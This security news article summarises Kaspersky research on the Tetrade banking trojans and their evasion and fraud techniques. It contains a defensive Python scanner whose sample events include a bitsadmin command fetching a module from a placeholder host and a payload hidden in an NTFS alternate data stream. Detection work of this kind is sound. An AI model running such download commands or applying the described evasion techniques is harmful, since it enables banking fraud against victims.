Cybersecurity researchers from Kaspersky Lab have detailed four different families of Brazilian banking trojans, tracked as Tetrade, that have targeted financial institutions in Brazil, Latin America, and Europe.
The four malware families are named Guildma, Javali, Melcoz, and Grandoreiro, and experts believe they are the product of a Brazilian banking group/operation that is evolving its capabilities to target banking users abroad.
The Brazilian cybercrime underground is recognized as the one most focused on the development and commercialization of banking trojans.
The Guildma malware has been active since at least 2015; it was initially observed in attacks aimed exclusively at Brazilian banking users. The malicious code has been updated constantly, with the authors implementing new features and extending the list of targets over time.
The malware operators have shown good knowledge of legitimate tools and have used them to prevent the threat from being detected by security solutions.
“Guildma spreads rely heavily on email shots containing a malicious file in compressed format, attached to the email body. File types vary from Visual Basic Script to LNK.” reads the analysis published by Kaspersky. “Most of the phishing messages emulate business requests, packages sent over courier services or any other regular corporate subjects, including the COVID-19 pandemic, but always with a corporate appearance.”
Javali has been active since November 2017; it primarily focused on the customers of financial institutions located in Brazil and Mexico.
Both Guildma and Javali employ a multi-stage attack chain and were distributed via phishing messages carrying compressed email attachments (e.g., .VBS, .LNK) or an HTML file that executes JavaScript to download a malicious file.
Experts noticed that the malware uses the BITSAdmin tool to download the additional modules. Attackers used the tool to avoid detection, since it is a legitimate component of the Windows operating system and is typically whitelisted.
The malware also leverages NTFS Alternate Data Streams to hide the presence of the downloaded payloads, and employs DLL Search Order Hijacking to launch the malware binaries.
“In order to execute the additional modules, the malware uses the process hollowing technique for hiding the malicious payload inside a whitelisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and decrypted in the memory as they are executed.” continues Kaspersky. “The final payload installed in the system will monitor user activities, such as opened websites and run applications and check if they are on the target list. When a target is detected, the module is executed, giving the criminals control over banking transactions.”
Once the final payload is installed on the target system, it monitors for specific bank websites. When the victim opens one of these sites, the attackers gain control over any financial transaction performed by the user.
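As an added defender-side example (not code from the report or from Kaspersky), the following scan walks constructed Sysmon-style events and flags the two Guildma/Javali behaviours described above: BITSAdmin being used to fetch a remote file, and a payload written into an NTFS alternate data stream. The event shapes, the URL and the file paths are all assumptions built for illustration.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample events, loosely modelled on Sysmon process-creation (ID 1)
# and file-stream-creation (ID 15) records. Not real telemetry from the report.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high "
                "http://placeholder.example/module.bin C:\\Users\\Public\\module.bin"},
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"id": 15, "target": r"C:\Users\Public\Documents\notes.txt:payload.dll"},
    {"id": 15, "target": r"C:\Users\Public\Documents\setup.exe:Zone.Identifier"},
    {"id": 1, "image": r"C:\Program Files\Example\tool.exe", "cmdline": "tool.exe --run"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def flag_bitsadmin_download(event: Dict) -> bool:
    """True when bitsadmin.exe is launched with /transfer and a remote URL."""
    if event.get("id") != 1:
        return False
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "").lower()
    return image.endswith("bitsadmin.exe") and "/transfer" in cmd and bool(URL_RE.search(cmd))


def flag_suspicious_ads(event: Dict) -> bool:
    """True when a file-stream event writes a named stream other than Zone.Identifier."""
    if event.get("id") != 15:
        return False
    target = event.get("target", "")
    # Drop the drive-letter colon so only a stream separator remains to be found.
    path = target[2:] if re.match(r"^[A-Za-z]:", target) else target
    if ":" not in path:
        return False
    stream = path.rsplit(":", 1)[1]
    # Zone.Identifier is the normal mark-of-the-web stream and is expected on downloads.
    return stream.lower() != "zone.identifier"


def scan(events: Iterable[Dict]) -> List[str]:
    """Return one human-readable finding per matching event."""
    findings = []
    for e in events:
        if flag_bitsadmin_download(e):
            findings.append("bitsadmin download: " + e["cmdline"])
        if flag_suspicious_ads(e):
            findings.append("alternate data stream written: " + e["target"])
    return findings
```

Run over the sample, the scan reports exactly the BITSAdmin transfer and the `notes.txt:payload.dll` stream, while the benign svchost launch and the Zone.Identifier stream are ignored.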
Melcoz is an open-source RAT developed by a group that has been active in Brazil since at least 2018 and has since expanded its operations overseas, including to Chile and Mexico.
Melcoz is able to steal passwords from browsers, and information from clipboard and Bitcoin wallets by replacing the original wallet details with the one under the control of the attacker.
The attack chain begins with phishing messages containing a link to a downloadable MSI installer.
The VBS scripts inside the installer package files (.MSI) download the malware onto the system and then abuse the AutoIt interpreter and the VMware NAT service to load the malicious DLL on the target system.
“After initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the malware enables the attacker to display an overlay window in front of the victim’s browser to manipulate the user’s session in the background,” state the researchers. “In this way, the fraudulent transaction is performed from the victim’s machine, making it harder to detect for anti-fraud solutions on the bank’s end.”
The malicious code could also capture other specific information related to a bank transaction, including a one-time password.
The last Tetrade malware family, named Grandoreiro, has been active since 2016, when it was involved in a campaign spread across Brazil, Mexico, Portugal, and Spain.
The malware is hosted on Google Sites pages and spreads via compromised websites and Google Ads; attackers also deliver it via spear-phishing messages. Experts noticed that it uses a domain generation algorithm (DGA) to hide the C2 address used during the attack.
“Brazilian crooks are rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (malware-as-a-service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners,” Kaspersky concluded.
“As a threat, these banking trojan families try to innovate by using DGA, encrypted payloads, process hollowing, DLL hijacking, a lot of LoLBins, fileless infections and other tricks as a way of obstructing analysis and detection. We believe that these threats will evolve to target more banks in more countries.”
(SecurityAffairs – hacking, Tetrade malware)